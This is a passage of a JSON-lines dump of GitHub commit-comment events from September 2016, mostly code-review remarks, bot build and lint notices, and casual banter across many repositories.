{"id":"4569653511","type":"CommitCommentEvent","actor":{"login":"zaincbs"},"repo":{"name":"zaincbs/PYTECH"},"payload":{"comment":{"id":19041103,"position":10,"line":10,"path":"cpFuntion.py","commit_id":"4d19b520554da97beb7ad8e63f7a58220a874004","created_at":"2016-09-15T17:53:03Z","updated_at":"2016-09-15T17:53:03Z","body":"Why are you not closing the files? It is waste of resource"}},"created_at":"2016-09-15T17:53:03Z"}
{"id":"4569654675","type":"CommitCommentEvent","actor":{"login":"zaincbs"},"repo":{"name":"zaincbs/PYTECH"},"payload":{"comment":{"id":19041108,"position":12,"line":12,"path":"cpFuntion.py","commit_id":"4d19b520554da97beb7ad8e63f7a58220a874004","created_at":"2016-09-15T17:53:16Z","updated_at":"2016-09-15T17:53:16Z","body":"Close this file as well."}},"created_at":"2016-09-15T17:53:16Z"}
{"id":"4569661459","type":"CommitCommentEvent","actor":{"login":"zaincbs"},"repo":{"name":"zaincbs/PYTECH"},"payload":{"comment":{"id":19041132,"position":29,"line":29,"path":"cpFuntion.py","commit_id":"4d19b520554da97beb7ad8e63f7a58220a874004","created_at":"2016-09-15T17:54:27Z","updated_at":"2016-09-15T17:54:27Z","body":"The program looks good. Could have a had a better structure.From your old programs you could have imported your read from file and write to file functions.\r\n"}},"created_at":"2016-09-15T17:54:27Z"}
{"id":"4569666598","type":"CommitCommentEvent","actor":{"login":"SarthakNarang"},"repo":{"name":"sud-vastav/android_device_oneplus_onyx"},"payload":{"comment":{"id":19041146,"position":null,"line":null,"path":null,"commit_id":"36966fd3a7caced28fea663d77847f55dad7a71c","created_at":"2016-09-15T17:55:19Z","updated_at":"2016-09-15T17:55:19Z","body":"At least i don't kang LOL. "}},"created_at":"2016-09-15T17:55:19Z"}
{"id":"4569669411","type":"CommitCommentEvent","actor":{"login":"jimmycrackc0rn7"},"repo":{"name":"jleahy7/CSCI-2999-Capstone_Project"},"payload":{"comment":{"id":19041157,"position":null,"line":null,"path":null,"commit_id":"796319b13290c91169385feb8786f6d3da44831c","created_at":"2016-09-15T17:55:45Z","updated_at":"2016-09-15T17:55:45Z","body":"It is located here\nhttps://github.com/jleahy7/CSCI-2999-Capstone_Project/blob/master/week3/thursday/Ever%20Health%20Final%20Plan.pptx\n\nClick 'View Raw\" to download the file and view it.\n\nOn Thu, Sep 15, 2016 at 1:45 PM, guybanaga123 <notifications@github.com>\nwrote:\n\n> Reviewed all files but still can`t find the most up to dated version of\n> the PP presentation...\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/jleahy7/CSCI-2999-Capstone_Project/commit/796319b13290c91169385feb8786f6d3da44831c#commitcomment-19040972>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AK0drpPh9iXAaxWHDNgeNtLsfBESV753ks5qqYQwgaJpZM4J-JOF>\n> .\n>\n"}},"created_at":"2016-09-15T17:55:45Z"}
{"id":"4569673230","type":"CommitCommentEvent","actor":{"login":"TyanNN"},"repo":{"name":"TyanNN/libtabun.rs"},"payload":{"comment":{"id":19041166,"position":82,"line":562,"path":"src/lib.rs","commit_id":"7465e5d947439ee1a47ec574224e0742764d933d","created_at":"2016-09-15T17:56:23Z","updated_at":"2016-09-15T17:56:23Z","body":"@andreymal прилеплю JSON, че"}},"created_at":"2016-09-15T17:56:23Z"}
{"id":"4569674254","type":"CommitCommentEvent","actor":{"login":"demofan"},"repo":{"name":"codebuger88/MVCHomework1"},"payload":{"comment":{"id":19041167,"position":7,"line":47,"path":"MyAccounts/MyAccounts/Controllers/AccountsController.cs","commit_id":"9a39d50f21fbb40567831d490083adaf33cc5a53","created_at":"2016-09-15T17:56:34Z","updated_at":"2016-09-15T17:56:34Z","body":"加上一個好習慣， save 都要被 try catch 包住，並且要做例外處理"}},"created_at":"2016-09-15T17:56:34Z"}
{"id":"4569674616","type":"CommitCommentEvent","actor":{"login":"BenLubar"},"repo":{"name":"NodeBB/NodeBB"},"payload":{"comment":{"id":19041169,"position":null,"line":null,"path":null,"commit_id":"a72ccfb067e635c1576b012875ff746880fbdaa8","created_at":"2016-09-15T17:56:38Z","updated_at":"2016-09-15T17:56:38Z","body":"You probably also want to remove the post index from the URL, right?"}},"created_at":"2016-09-15T17:56:38Z"}
{"id":"4569675658","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19041172,"position":null,"line":null,"path":null,"commit_id":"b7e0cf82c24f5bf6dfd56ac7d605ea37cf8fe6e7","created_at":"2016-09-15T17:56:47Z","updated_at":"2016-09-15T17:56:47Z","body":"os_2_0_develop (kbenne) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-b7e0cf82c24f5bf6dfd56ac7d605ea37cf8fe6e7-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a>  \n"}},"created_at":"2016-09-15T17:56:47Z"}
{"id":"4569677377","type":"CommitCommentEvent","actor":{"login":"casaout"},"repo":{"name":"sealuzh/PersonalAnalytics"},"payload":{"comment":{"id":19041181,"position":49,"line":259,"path":"src/client/AM.PA.MonitoringTool/MuseTracker/Daemon.cs","commit_id":"cd2fb4829bbf9cde15282ad4236bae5eb8dd2b91","created_at":"2016-09-15T17:57:02Z","updated_at":"2016-09-15T17:57:02Z","body":"cool 👍 "}},"created_at":"2016-09-15T17:57:02Z"}
{"id":"4569680849","type":"CommitCommentEvent","actor":{"login":"koradiavatsal"},"repo":{"name":"sud-vastav/android_device_oneplus_onyx"},"payload":{"comment":{"id":19041193,"position":null,"line":null,"path":null,"commit_id":"36966fd3a7caced28fea663d77847f55dad7a71c","created_at":"2016-09-15T17:57:35Z","updated_at":"2016-09-15T17:57:35Z","body":"*grabs popcorn and coke* "}},"created_at":"2016-09-15T17:57:35Z"}
{"id":"4569681953","type":"CommitCommentEvent","actor":{"login":"mike-tutkowski"},"repo":{"name":"mike-tutkowski/cloudstack"},"payload":{"comment":{"id":19041198,"position":8,"line":26,"path":"plugins/storage/volume/solidfire/pom.xml","commit_id":"4ed6a7217b18d8e356aeb26867736c5a9432eade","created_at":"2016-09-15T17:57:45Z","updated_at":"2016-09-15T17:57:45Z","body":"This is just my personal GitHub account so I have a backup of this code.\n\nWhen I open a PR on the CloudStack repo, I will do it pointing to our SDK on Maven Central.\n\nOn Sep 15, 2016, at 9:36 AM, Jason Ryan Womack <notifications@github.com<mailto:notifications@github.com>> wrote:\n\n\nAre you sure you want to expose the internal repo, even if you are going to swap it out next week. Seems like info that we just don't want getting out.\n\n-\nYou are receiving this because you authored the thread.\nReply to this email directly, view it on GitHub<https://github.com/mike-tutkowski/cloudstack/commit/4ed6a7217b18d8e356aeb26867736c5a9432eade#commitcomment-19038694>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AC4SH62oKedS0afubAP6Dic07VawMYh4ks5qqWXrgaJpZM4J-A8z>.\n"}},"created_at":"2016-09-15T17:57:45Z"}
{"id":"4569682438","type":"CommitCommentEvent","actor":{"login":"guilhermesilveira"},"repo":{"name":"marcelooliveira/alura-linq"},"payload":{"comment":{"id":19041201,"position":34,"line":34,"path":"AluraLinq.Console/Problemas/20. obter um relatório das notas fiscais cujo total está acima da média/Problema20.cs","commit_id":"9131d1e8bda662f0089c3f8267364cb66530e522","created_at":"2016-09-15T17:57:50Z","updated_at":"2016-09-15T17:57:50Z","body":"sei que aqui ja passou muito tempo que ensinou o padright hehe\r\nmas aqui é o tipico exemplo do babysteps q gosto quando llllllaaaaa no primeiro exemplo vc usou ele a primeira vez. pode rodar normal, mostrar que funcionou, era o que queria, mas so ficou meio feinho pq nao estava alinhado... ai coloca o padright. repara que é só uma rodadinha a mais, não fica basico, mas atende o aluno basico e intermediario"}},"created_at":"2016-09-15T17:57:50Z"}
{"id":"4569682626","type":"CommitCommentEvent","actor":{"login":"demofan"},"repo":{"name":"codebuger88/MVCHomework1"},"payload":{"comment":{"id":19041202,"position":21,"line":75,"path":"MyAccounts/MyAccounts/Views/Accounts/Index.cshtml","commit_id":"6ae11e59c8b736fc36eb9bf4c5d05b575af1337b","created_at":"2016-09-15T17:57:52Z","updated_at":"2016-09-15T17:57:52Z","body":"不要一直忘情的在 cshtml 內增加 js 建議養成習慣都抽去 js 檔"}},"created_at":"2016-09-15T17:57:52Z"}
{"id":"4569683473","type":"CommitCommentEvent","actor":{"login":"ChronoMonochrome"},"repo":{"name":"Meticulus/android_device_samsung_codinalte"},"payload":{"comment":{"id":19041204,"position":null,"line":null,"path":null,"commit_id":"7aaabe8577a61a2b0cd039670cd639c0a06373d3","created_at":"2016-09-15T17:58:00Z","updated_at":"2016-09-15T17:58:00Z","body":"Actually I can't check if proximity works because it's broken on my phone after the touchscreen replacement, but it at least does open in this app, so I guess it should work. I have fixed accelerometer by using parameters I've found in app. Also had to swap  X and Y coordinates and use different coefficient  than CONVERT_A (strangely, but Y uses the negative one): https://github.com/ChronoMonochrome/android_hardware_u8500/commit/662bdc1e152bb645b96c6095709952535318c865\r\nNow there is another problem with the magnetometer, it's even not shown in this app. I don't yet know what exactly sensor is used in codina, so I need to investigate it a bit more."}},"created_at":"2016-09-15T17:58:00Z"}
{"id":"4569686081","type":"CommitCommentEvent","actor":{"login":"zeeshanhussain"},"repo":{"name":"sud-vastav/android_device_oneplus_onyx"},"payload":{"comment":{"id":19041218,"position":null,"line":null,"path":null,"commit_id":"36966fd3a7caced28fea663d77847f55dad7a71c","created_at":"2016-09-15T17:58:28Z","updated_at":"2016-09-15T17:58:28Z","body":"teh kanger asswinr64 is here hau are you ? "}},"created_at":"2016-09-15T17:58:28Z"}
{"id":"4569687690","type":"CommitCommentEvent","actor":{"login":"SarthakNarang"},"repo":{"name":"sud-vastav/android_device_oneplus_onyx"},"payload":{"comment":{"id":19041223,"position":null,"line":null,"path":null,"commit_id":"36966fd3a7caced28fea663d77847f55dad7a71c","created_at":"2016-09-15T17:58:44Z","updated_at":"2016-09-15T17:58:44Z","body":"This shows how he stares our repos! Poor guy"}},"created_at":"2016-09-15T17:58:44Z"}
{"id":"4569689800","type":"CommitCommentEvent","actor":{"login":"Megatron007"},"repo":{"name":"sud-vastav/android_device_oneplus_onyx"},"payload":{"comment":{"id":19041233,"position":null,"line":null,"path":null,"commit_id":"36966fd3a7caced28fea663d77847f55dad7a71c","created_at":"2016-09-15T17:59:07Z","updated_at":"2016-09-15T17:59:07Z","body":"."}},"created_at":"2016-09-15T17:59:07Z"}
{"id":"4569693091","type":"CommitCommentEvent","actor":{"login":"demofan"},"repo":{"name":"codebuger88/MVCHomework1"},"payload":{"comment":{"id":19041245,"position":34,"line":29,"path":"MyAccounts/MyAccounts/Controllers/AccountsController.cs","commit_id":"0c1b0b31ba18bc9043cf866c000faab66d08c950","created_at":"2016-09-15T17:59:39Z","updated_at":"2016-09-15T17:59:39Z","body":"你的 GetLists 方法中已經 ToList 了，所以你這裡的分頁是毫無意義的，你一樣是把一千筆資料都丟進記憶體然後只顯示 10 筆"}},"created_at":"2016-09-15T17:59:39Z"}
{"id":"4569693843","type":"CommitCommentEvent","actor":{"login":"aroxby"},"repo":{"name":"ZombieRoxtar/LxssLoader"},"payload":{"comment":{"id":19041248,"position":99,"line":99,"path":"LxssLoader/lxss.h","commit_id":"4cc84b9d2e1e5ce14f1e74b6f0cc467cae185b60","created_at":"2016-09-15T17:59:46Z","updated_at":"2016-09-15T17:59:46Z","body":"I saw that later.  Still, future you might thank you for putting the URL at the top of this file."}},"created_at":"2016-09-15T17:59:46Z"}
{"id":"4569694392","type":"CommitCommentEvent","actor":{"login":"zeeshanhussain"},"repo":{"name":"sud-vastav/android_device_oneplus_onyx"},"payload":{"comment":{"id":19041251,"position":null,"line":null,"path":null,"commit_id":"36966fd3a7caced28fea663d77847f55dad7a71c","created_at":"2016-09-15T17:59:51Z","updated_at":"2016-09-15T17:59:51Z","body":"its good that github removed public activity atleast he can't stalk xD "}},"created_at":"2016-09-15T17:59:51Z"}
{"id":"4569696033","type":"CommitCommentEvent","actor":{"login":"demofan"},"repo":{"name":"codebuger88/MVCHomework1"},"payload":{"comment":{"id":19041258,"position":59,"line":51,"path":"MyAccounts/MyAccounts/Controllers/AccountsController.cs","commit_id":"0c1b0b31ba18bc9043cf866c000faab66d08c950","created_at":"2016-09-15T18:00:10Z","updated_at":"2016-09-15T18:00:10Z","body":"一樣的問題，剩下的我就不講了"}},"created_at":"2016-09-15T18:00:10Z"}
{"id":"4569696133","type":"CommitCommentEvent","actor":{"login":"fpvandoorn"},"repo":{"name":"leanprover/lean"},"payload":{"comment":{"id":19041259,"position":11,"line":11,"path":"tests/lean/run/let3.lean","commit_id":"0b90ace9f8b284b7ef96d826a42842ac58dcadec","created_at":"2016-09-15T18:00:12Z","updated_at":"2016-09-15T18:00:12Z","body":"My 2 cents: \r\nI think that we should not use `let` for this. The fact that `zeta`-reduction is not supported (as Leo pointed out) will be confusing, and I don't think that any amount of notes in the manual will change that. I agree that changing `let` to `obtain` sounds strange, though.\r\n\r\nOne sort-of related question: now that we have a primitive `let`, wouldn't it be better to change the meaning of \r\n```\r\nobtain a b, from (v : A × B),\r\n[...]\r\n```\r\nto the following?\r\n```\r\nlet a := v.1 in\r\nlet b := v.2 in\r\n[...]\r\n```\r\nSo the proposal is to make `obtain` to be syntax sugar for a sequence of `let` expressions.\r\nThen the example Leo puts forward here does work. The example\r\n```\r\nlet (n, m) := (10, 10) in\r\nexists (v : vector nat n) (w : vector nat m), v = w\r\n```\r\nshould type-check, because both `n` and `m` zeta-reduce to `10`. With this behavior, I think it *is* reasonable to use `let` for the `obtain` command.\r\n\r\n---\r\n\r\nNote: not all examples which a user might expect will work \r\n```\r\nlet (a, b) := (x : A × B) in\r\nexists (v : vector nat x) (w : vector nat (a, b)), v = w\r\n```\r\nwill not work, since we don't have a judgmental eta-rule for records (unfortunately)."}},"created_at":"2016-09-15T18:00:12Z"}
{"id":"4569696486","type":"CommitCommentEvent","actor":{"login":"aroxby"},"repo":{"name":"ZombieRoxtar/LxssLoader"},"payload":{"comment":{"id":19041260,"position":34,"line":34,"path":"LxssLoader/main.cpp","commit_id":"4cc84b9d2e1e5ce14f1e74b6f0cc467cae185b60","created_at":"2016-09-15T18:00:16Z","updated_at":"2016-09-15T18:00:16Z","body":"To make this work as a windows program?"}},"created_at":"2016-09-15T18:00:16Z"}
{"id":"4569704913","type":"CommitCommentEvent","actor":{"login":"humblec"},"repo":{"name":"humblec/kubernetes"},"payload":{"comment":{"id":19041281,"position":219,"line":527,"path":"pkg/volume/glusterfs/glusterfs.go","commit_id":"fe6122b238358dc1704b302e2f44414294ee098d","created_at":"2016-09-15T18:01:37Z","updated_at":"2016-09-15T18:01:37Z","body":"Let me think some more on the possibilities and update here  :)"}},"created_at":"2016-09-15T18:01:37Z"}
{"id":"4569709375","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"richelbilderbeek/nLTT"},"payload":{"comment":{"id":19041289,"position":null,"line":null,"path":null,"commit_id":"b7e760e066d3385144c580f9a0c440d85d039f35","created_at":"2016-09-15T18:02:22Z","updated_at":"2016-09-15T18:02:22Z","body":"[R/ABC_SMC.R:186:1:](https://github.com/richelbilderbeek/nLTT/blob/b7e760e066d3385144c580f9a0c440d85d039f35/R/ABC_SMC.R#L186) *style:* **Trailing whitespace is superfluous.**\n```r\n​    \n^~~~\n```"}},"created_at":"2016-09-15T18:02:22Z"}
{"id":"4569712837","type":"CommitCommentEvent","actor":{"login":"qyot27"},"repo":{"name":"psteinb/x264"},"payload":{"comment":{"id":19041301,"position":null,"line":null,"path":null,"commit_id":"570d14ae50a1a666d2f71280500dc93c73415957","created_at":"2016-09-15T18:02:55Z","updated_at":"2016-09-15T18:02:55Z","body":"I didn't notice that it was being reverted back to what upstream has.  Never mind then."}},"created_at":"2016-09-15T18:02:55Z"}
{"id":"4569713330","type":"CommitCommentEvent","actor":{"login":"zetsingithub"},"repo":{"name":"octocat/Hello-World"},"payload":{"comment":{"id":19041302,"position":1,"line":1,"path":"README","commit_id":"553c2077f0edc3d5dc5d17262f6aa498e69d6f8e","created_at":"2016-09-15T18:02:59Z","updated_at":"2016-09-15T18:02:59Z","body":"zzzzzzzzzzzzzzzzzzzzzzzzzz"}},"created_at":"2016-09-15T18:02:59Z"}
{"id":"4569714474","type":"CommitCommentEvent","actor":{"login":"demofan"},"repo":{"name":"codebuger88/MVCHomework1"},"payload":{"comment":{"id":19041310,"position":39,"line":79,"path":"MyAccounts/MyAccounts/Controllers/AccountController.cs","commit_id":"4429a41e65f1585696b057ce3b0d5bc01a4700bc","created_at":"2016-09-15T18:03:13Z","updated_at":"2016-09-15T18:03:13Z","body":"你不覺得應該把這段假登入放到上面的 if 比較合理嗎？（當然那個！要拿掉）"}},"created_at":"2016-09-15T18:03:13Z"}
{"id":"4569714651","type":"CommitCommentEvent","actor":{"login":"SaatvikShukla"},"repo":{"name":"sud-vastav/android_device_oneplus_onyx"},"payload":{"comment":{"id":19041312,"position":null,"line":null,"path":null,"commit_id":"36966fd3a7caced28fea663d77847f55dad7a71c","created_at":"2016-09-15T18:03:15Z","updated_at":"2016-09-15T18:03:15Z","body":"\r\n![](https://cdn.meme.am/instances/500x/71733934.jpg)\r\n"}},"created_at":"2016-09-15T18:03:15Z"}
{"id":"4569716241","type":"CommitCommentEvent","actor":{"login":"Melvin-Tan"},"repo":{"name":"Wishes-CS3216/Wishes-Backend"},"payload":{"comment":{"id":19041320,"position":8,"line":8,"path":"Wishes/app/controllers/wishes_controller.rb","commit_id":"13f0538df6ec73b0504f2371e6a3e7a1fb811c7f","created_at":"2016-09-15T18:03:31Z","updated_at":"2016-09-15T18:03:31Z","body":"Go through wish_params params.require(:wish).permit([:user_id, :title])"}},"created_at":"2016-09-15T18:03:31Z"}
{"id":"4569718949","type":"CommitCommentEvent","actor":{"login":"zetsingithub"},"repo":{"name":"octocat/Hello-World"},"payload":{"comment":{"id":19041325,"position":null,"line":null,"path":null,"commit_id":"553c2077f0edc3d5dc5d17262f6aa498e69d6f8e","created_at":"2016-09-15T18:03:58Z","updated_at":"2016-09-15T18:03:58Z","body":"xxxxxxxxxxxxxxxxxxxxx"}},"created_at":"2016-09-15T18:03:58Z"}
{"id":"4569722716","type":"CommitCommentEvent","actor":{"login":"aroxby"},"repo":{"name":"ZombieRoxtar/LxssLoader"},"payload":{"comment":{"id":19041338,"position":76,"line":76,"path":"LxssLoader/main.cpp","commit_id":"4cc84b9d2e1e5ce14f1e74b6f0cc467cae185b60","created_at":"2016-09-15T18:04:37Z","updated_at":"2016-09-15T18:04:37Z","body":"What gave you idea that `CoInitializeSecurity` is required?  I haven't seen that before.  Some people use `CoInitialize` and still other people seem to do ok with neither."}},"created_at":"2016-09-15T18:04:37Z"}
{"id":"4569724657","type":"CommitCommentEvent","actor":{"login":"Megatron007"},"repo":{"name":"sud-vastav/android_device_oneplus_onyx"},"payload":{"comment":{"id":19041344,"position":null,"line":null,"path":null,"commit_id":"36966fd3a7caced28fea663d77847f55dad7a71c","created_at":"2016-09-15T18:04:57Z","updated_at":"2016-09-15T18:04:57Z","body":"..........."}},"created_at":"2016-09-15T18:04:57Z"}
{"id":"4569725354","type":"CommitCommentEvent","actor":{"login":"Shukhov"},"repo":{"name":"Shukhov/My-First-App"},"payload":{"comment":{"id":19041348,"position":null,"line":null,"path":null,"commit_id":"296301772ebea81ce37fbfb60bdad041bacaa535","created_at":"2016-09-15T18:05:05Z","updated_at":"2016-09-15T18:05:05Z","body":"Initial checkin just to learn how to commit using GitHub"}},"created_at":"2016-09-15T18:05:05Z"}
{"id":"4569729204","type":"CommitCommentEvent","actor":{"login":"aroxby"},"repo":{"name":"ZombieRoxtar/LxssLoader"},"payload":{"comment":{"id":19041360,"position":124,"line":124,"path":"LxssLoader/main.cpp","commit_id":"4cc84b9d2e1e5ce14f1e74b6f0cc467cae185b60","created_at":"2016-09-15T18:05:45Z","updated_at":"2016-09-15T18:05:45Z","body":"If you look at the documentation for `CreateProcess`, esp. the `STARTUPINFO` section, I think it explains how to setup handles."}},"created_at":"2016-09-15T18:05:45Z"}
{"id":"4569729595","type":"CommitCommentEvent","actor":{"login":"maver1ck"},"repo":{"name":"dataArtisans/flink-training-exercises"},"payload":{"comment":{"id":19041362,"position":122,"line":122,"path":"src/main/java/com/dataartisans/flinktraining/exercises/datastream_java/state/TravelTimePrediction.java","commit_id":"ed4a3429a253fd056f7c3e882e22e9df38d05c59","created_at":"2016-09-15T18:05:49Z","updated_at":"2016-09-15T18:05:49Z","body":"Yep. You're right.\r\nThanks for the answer.\r\n"}},"created_at":"2016-09-15T18:05:49Z"}
{"id":"4569730288","type":"CommitCommentEvent","actor":{"login":"ilyubin"},"repo":{"name":"FoX31/java_pft"},"payload":{"comment":{"id":19041363,"position":14,"line":14,"path":"sandbox/src/main/java/ru/stqa/pft/sandbox/Point.java","commit_id":"241e772137ec90f09b33a898d4fbece96f50ca29","created_at":"2016-09-15T18:05:56Z","updated_at":"2016-09-15T18:05:56Z","body":"Еще добавляем:\r\n  public static double distance(Point p2){\r\n    return Math.sqrt((this.x - p2.x)^2 + (this.y - p2.y)^2 );\r\n  }"}},"created_at":"2016-09-15T18:05:56Z"}
{"id":"4569732591","type":"CommitCommentEvent","actor":{"login":"mchandschuh"},"repo":{"name":"QuantConnect/Lean"},"payload":{"comment":{"id":19041370,"position":31,"line":31,"path":"Common/Securities/EquityPriceVariationModel.cs","commit_id":"c0f95f712c2a090b717b06274040eb1618206a12","created_at":"2016-09-15T18:06:20Z","updated_at":"2016-09-15T18:06:20Z","body":"Default ctor auto generated by compiler. "}},"created_at":"2016-09-15T18:06:20Z"}
{"id":"4569738447","type":"CommitCommentEvent","actor":{"login":"AlecKC"},"repo":{"name":"illinois-cs241/illinois-cs241.github.io"},"payload":{"comment":{"id":19041393,"position":null,"line":null,"path":null,"commit_id":"c3a40a8caba9adcf13e420644d1d8ea82815a171","created_at":"2016-09-15T18:07:12Z","updated_at":"2016-09-15T18:07:12Z","body":"Don't forget if size is the same."}},"created_at":"2016-09-15T18:07:12Z"}
{"id":"4569738501","type":"CommitCommentEvent","actor":{"login":"mchandschuh"},"repo":{"name":"QuantConnect/Lean"},"payload":{"comment":{"id":19041394,"position":28,"line":28,"path":"Common/Securities/SecurityPriceVariationModel.cs","commit_id":"c0f95f712c2a090b717b06274040eb1618206a12","created_at":"2016-09-15T18:07:12Z","updated_at":"2016-09-15T18:07:12Z","body":"Default ctor auto generated by compiler. "}},"created_at":"2016-09-15T18:07:12Z"}
{"id":"4569739294","type":"CommitCommentEvent","actor":{"login":"demofan"},"repo":{"name":"codebuger88/MVCHomework1"},"payload":{"comment":{"id":19041396,"position":null,"line":null,"path":null,"commit_id":"c236bceff3296849ad8b33c0c4fd0eb681c4fe2c","created_at":"2016-09-15T18:07:19Z","updated_at":"2016-09-15T18:07:19Z","body":"使用這套請務必記得要調整權限，你現在是只要知道網址都可以看光你的所有錯誤"}},"created_at":"2016-09-15T18:07:19Z"}
{"id":"4569741768","type":"CommitCommentEvent","actor":{"login":"mchandschuh"},"repo":{"name":"QuantConnect/Lean"},"payload":{"comment":{"id":19041402,"position":30,"line":30,"path":"Tests/Common/Securities/Equity/PriceVariationModelsTests.cs","commit_id":"c0f95f712c2a090b717b06274040eb1618206a12","created_at":"2016-09-15T18:07:44Z","updated_at":"2016-09-15T18:07:44Z","body":"Great  stuff! "}},"created_at":"2016-09-15T18:07:44Z"}
{"id":"4569743860","type":"CommitCommentEvent","actor":{"login":"crumdidlyumshis"},"repo":{"name":"ElvUI-WotLK/ElvUI"},"payload":{"comment":{"id":19041406,"position":null,"line":null,"path":null,"commit_id":"4233ef72d2eb1d0b5ffddd83380e81dace3bf7b7","created_at":"2016-09-15T18:08:05Z","updated_at":"2016-09-15T18:08:05Z","body":"also check the \"Local Time\" box. Time doesn't switch when true."}},"created_at":"2016-09-15T18:08:05Z"}
{"id":"4569746899","type":"CommitCommentEvent","actor":{"login":"jegger"},"repo":{"name":"allestuetsmerweh/garden.cefpython"},"payload":{"comment":{"id":19041414,"position":78,"line":448,"path":"cefbrowser/cefbrowser.py","commit_id":"cba169e3bd085cc8350ce0dfa26eddcf76150c0e","created_at":"2016-09-15T18:08:35Z","updated_at":"2016-09-15T18:08:35Z","body":"Thanks much for your hint! 👍 :) -> This resulted in the HTML5 examples demo page into a flickering bin-image"}},"created_at":"2016-09-15T18:08:35Z"}
{"id":"4569747209","type":"CommitCommentEvent","actor":{"login":"eieirelaxz4"},"repo":{"name":"DunstleOS/openkore"},"payload":{"comment":{"id":19041415,"position":null,"line":null,"path":null,"commit_id":"3bf4a41ae6c459753cc5486d514d111723c33758","created_at":"2016-09-15T18:08:38Z","updated_at":"2016-09-15T18:08:38Z","body":"Thk"}},"created_at":"2016-09-15T18:08:38Z"}
{"id":"4569748452","type":"CommitCommentEvent","actor":{"login":"earwig"},"repo":{"name":"illinois-cs241/illinois-cs241.github.io"},"payload":{"comment":{"id":19041417,"position":null,"line":null,"path":null,"commit_id":"c3a40a8caba9adcf13e420644d1d8ea82815a171","created_at":"2016-09-15T18:08:51Z","updated_at":"2016-09-15T18:08:51Z","body":"\"If the new size is the same as the old size, do nothing.\"?"}},"created_at":"2016-09-15T18:08:51Z"}
{"id":"4569748534","type":"CommitCommentEvent","actor":{"login":"fpvandoorn"},"repo":{"name":"leanprover/lean"},"payload":{"comment":{"id":19041420,"position":11,"line":11,"path":"tests/lean/run/let3.lean","commit_id":"0b90ace9f8b284b7ef96d826a42842ac58dcadec","created_at":"2016-09-15T18:08:51Z","updated_at":"2016-09-15T18:08:51Z","body":"Or if we don't want to change the meaning of `obtain` we could leave the meaning of `obtain` alone, but make\r\n```\r\nlet (a, b) := (x : A × B) in\r\n[...]\r\n```\r\n be sugar for\r\n```\r\nlet a := x.1 in\r\nlet b := x.2 in\r\n[...]\r\n```"}},"created_at":"2016-09-15T18:08:51Z"}
{"id":"4569749374","type":"CommitCommentEvent","actor":{"login":"crumdidlyumshis"},"repo":{"name":"ElvUI-WotLK/ElvUI"},"payload":{"comment":{"id":19041425,"position":null,"line":null,"path":null,"commit_id":"4233ef72d2eb1d0b5ffddd83380e81dace3bf7b7","created_at":"2016-09-15T18:09:00Z","updated_at":"2016-09-15T18:09:00Z","body":"or maybe it's \"Server Time\"\r\n"}},"created_at":"2016-09-15T18:09:00Z"}
{"id":"4569753421","type":"CommitCommentEvent","actor":{"login":"wf9a5m75"},"repo":{"name":"mapsplugin/cordova-plugin-googlemaps"},"payload":{"comment":{"id":19041432,"position":null,"line":null,"path":null,"commit_id":"8aca00f6fe25bd1614c49a4fa70da384f239b073","created_at":"2016-09-15T18:09:40Z","updated_at":"2016-09-15T18:09:40Z","body":"Why did you revert this?"}},"created_at":"2016-09-15T18:09:40Z"}
{"id":"4569756361","type":"CommitCommentEvent","actor":{"login":"demofan"},"repo":{"name":"CreatorLin/SkillTreeMVC5Homework"},"payload":{"comment":{"id":19041438,"position":20,"line":20,"path":"Homework1/Homework1/ValidationAttribute/EndDateAttribute.cs","commit_id":"c392716ecada6e8269eb9961b009f985f8b4a8ce","created_at":"2016-09-15T18:10:11Z","updated_at":"2016-09-15T18:10:11Z","body":"這裡改用 DateTime.TryParse 可以能會保險一點，畢竟你參數都是 Int 不能保證可以轉成 DateTime"}},"created_at":"2016-09-15T18:10:11Z"}
{"id":"4569757271","type":"CommitCommentEvent","actor":{"login":"rmanalan"},"repo":{"name":"rmanalan/service-tester"},"payload":{"comment":{"id":19041443,"position":null,"line":null,"path":null,"commit_id":"d761f9b34cb76efa84ed00e27a3165aba453877f","created_at":"2016-09-15T18:10:20Z","updated_at":"2016-09-15T18:10:20Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;3XObmmeq&#x2F;30-test-card\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Test card</a>"}},"created_at":"2016-09-15T18:10:20Z"}
{"id":"4569760617","type":"CommitCommentEvent","actor":{"login":"MichelWorld"},"repo":{"name":"MichelWorld/hello-world"},"payload":{"comment":{"id":19041454,"position":null,"line":null,"path":null,"commit_id":"af99b2a840d0e114cfa1e371b78537dafedd26f4","created_at":"2016-09-15T18:10:52Z","updated_at":"2016-09-15T18:10:52Z","body":"that looks nice!"}},"created_at":"2016-09-15T18:10:52Z"}
{"id":"4569765381","type":"CommitCommentEvent","actor":{"login":"R-Bixby"},"repo":{"name":"OfficeDev/Project-REST-Basic-Operations"},"payload":{"comment":{"id":19041468,"position":null,"line":null,"path":null,"commit_id":"022cc2156157ff41450086e1cf5f07b55d6f2a8e","created_at":"2016-09-15T18:11:40Z","updated_at":"2016-09-15T18:11:40Z","body":"Ryan,\r\n\r\nI’m replying to you only because there’s a lot I don’t know. I’m a contractor and have used markdown languages elsewhere.\r\n\r\nQuick question:\r\n    Why would you NOT put this in a code block? The characters within a code block all pass through the rendering engine without any changes.\r\n\r\nI quickly did this (and indented all the lines with 4 spaces) and it looks great. I used Markdown Pad to test my results.\r\n(See attached)\r\n\r\nI’d love to hear your comments,\r\n\r\n-Richard Bixby\r\n\r\nFrom: Ryan Psenski [mailto:notifications@github.com]\r\nSent: Thursday, September 15, 2016 7:52 AM\r\nTo: OfficeDev/Project-REST-Basic-Operations <Project-REST-Basic-Operations@noreply.github.com>\r\nSubject: Re: [OfficeDev/Project-REST-Basic-Operations] Update updateprojectcustomfieldvalues.ps1 (022cc21)\r\n\r\n\r\nFormatting code in this UI is painful. Attaching a basic text 